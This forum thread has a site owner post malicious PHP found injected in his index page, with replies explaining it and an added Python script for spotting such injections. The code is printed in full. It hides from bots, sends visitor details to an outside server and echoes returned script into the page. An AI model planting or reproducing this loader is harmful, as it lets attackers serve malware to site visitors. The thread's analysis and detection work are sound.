bigBrumm (Posted January 30, 2014)

Someone broke into my site and added the following to my index page:

error_reporting(0);
ini_set('display_errors',0);
$wp_amcjz4740 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_amcjz4740) && !preg_match ('/bot/i', $wp_amcjz4740))){
$wp_amcjz094740="http://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_amcjz4740);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_amcjz094740);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_4740amcjz = curl_exec ($ch);
curl_close($ch);}
if ( substr($wp_4740amcjz,1,3) === 'scr' ){ echo $wp_4740amcjz; }

I've removed it and changed the FTP access. But I was wondering what it actually did? I can understand bits, but cannot really put everything together.

davidannis (Posted January 30, 2014)

Looks to me like it looks to make sure that the request was from a browser, not from a bot, and if it is, adds malicious code to your page from a remote server. By not serving the malicious code to bots it delays Google warning users that your site is hosting malware.

bigBrumm (Author, Posted January 30, 2014)

Thanks, how can I find out what the address of the remote server is?

davidannis (Posted January 30, 2014, edited January 30, 2014 by davidannis)

$wp_amcjz094740="http://"."template"."body".".com/body"."/

It looks to me like it is set to go to http[This is here to break the link]://template.body.com/body/ but I may be missing something and I'm not surfing over there to figure it out.

davidannis (Posted January 30, 2014)

Is there anybody with more experience with cURL than me, who can confirm or correct me? I don't have confidence in my answer.

requinix (Posted January 30, 2014, edited January 30, 2014 by requinix)

It retrieves stuff from that server, after telling it which site it's running from and some information about the user, then will probably output whatever stuff it got back. It means they can put on your site anything from ads to malware to malicious JavaScript to basically anything they want. Only thing it won't do is execute arbitrary PHP code.
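
As an added example that is not part of the original thread: a small Python triage script that folds the concatenated string literals in the injected snippet, so the contacted host can be read statically without requesting anything, and flags the cloak, fetch and echo behaviour described in the replies. The trait names and the functions `fold_literals`, `analyse` and `looks_like_cloaked_loader` are hypothetical names chosen here, and the matching is a regex heuristic, not a PHP parser.

```python
import re
from urllib.parse import urlsplit

# The injected snippet as quoted in the first post (line breaks added between statements).
SAMPLE = r'''error_reporting(0); ini_set('display_errors',0); $wp_amcjz4740 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_amcjz4740) && !preg_match ('/bot/i', $wp_amcjz4740))){
$wp_amcjz094740="http://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_amcjz4740);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_amcjz094740);curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_4740amcjz = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_4740amcjz,1,3) === 'scr' ){ echo $wp_4740amcjz; }'''

# One PHP string literal without escapes (heuristic: regexes, not a PHP parser).
LIT = r'''(?:"([^"\\]*)"|'([^'\\]*)')'''
JOIN = re.compile(LIT + r"\s*\.\s*" + LIT)

def fold_literals(src):
    """Merge string literals joined by PHP's '.' operator until nothing changes."""
    prev = None
    while prev != src:
        prev = src
        src = JOIN.sub(lambda m: '"' + "".join(g or "" for g in m.groups()) + '"', src)
    return src

# Hypothetical trait names for the behaviours discussed in the thread.
TRAITS = {
    "errors_suppressed": r"error_reporting\s*\(\s*0\s*\)",
    "reads_user_agent": r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]",
    "skips_bots": r"!\s*preg_match\s*\(\s*['\"]/[^'\"]*bot",
    "sends_visitor_ip": r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]",
    "remote_fetch": r"\bcurl_exec\s*\(",
    "echoes_response": r"(\$\w+)\s*=\s*curl_exec\b[\s\S]*\becho\s+\1\b",
}

def analyse(src):
    """Return (sorted trait names found, sorted hosts named in URL literals)."""
    folded = fold_literals(src)
    found = sorted(name for name, rx in TRAITS.items() if re.search(rx, folded))
    urls = re.findall(r"[\"'](https?://[^\"']+)", folded)
    return found, sorted({urlsplit(u).hostname for u in urls})

def looks_like_cloaked_loader(src):
    """Flag code that reads the User-Agent, fetches a hard-coded URL and echoes the reply."""
    found, hosts = analyse(src)
    return {"reads_user_agent", "remote_fetch", "echoes_response"} <= set(found) and bool(hosts)

if __name__ == "__main__":
    traits, hosts = analyse(SAMPLE)
    print("traits:", traits)
    print("hosts :", hosts, "flagged:", looks_like_cloaked_loader(SAMPLE))
```

Run over every `.php` file in the web root after a compromise, a check like this helps find other files carrying the same injection.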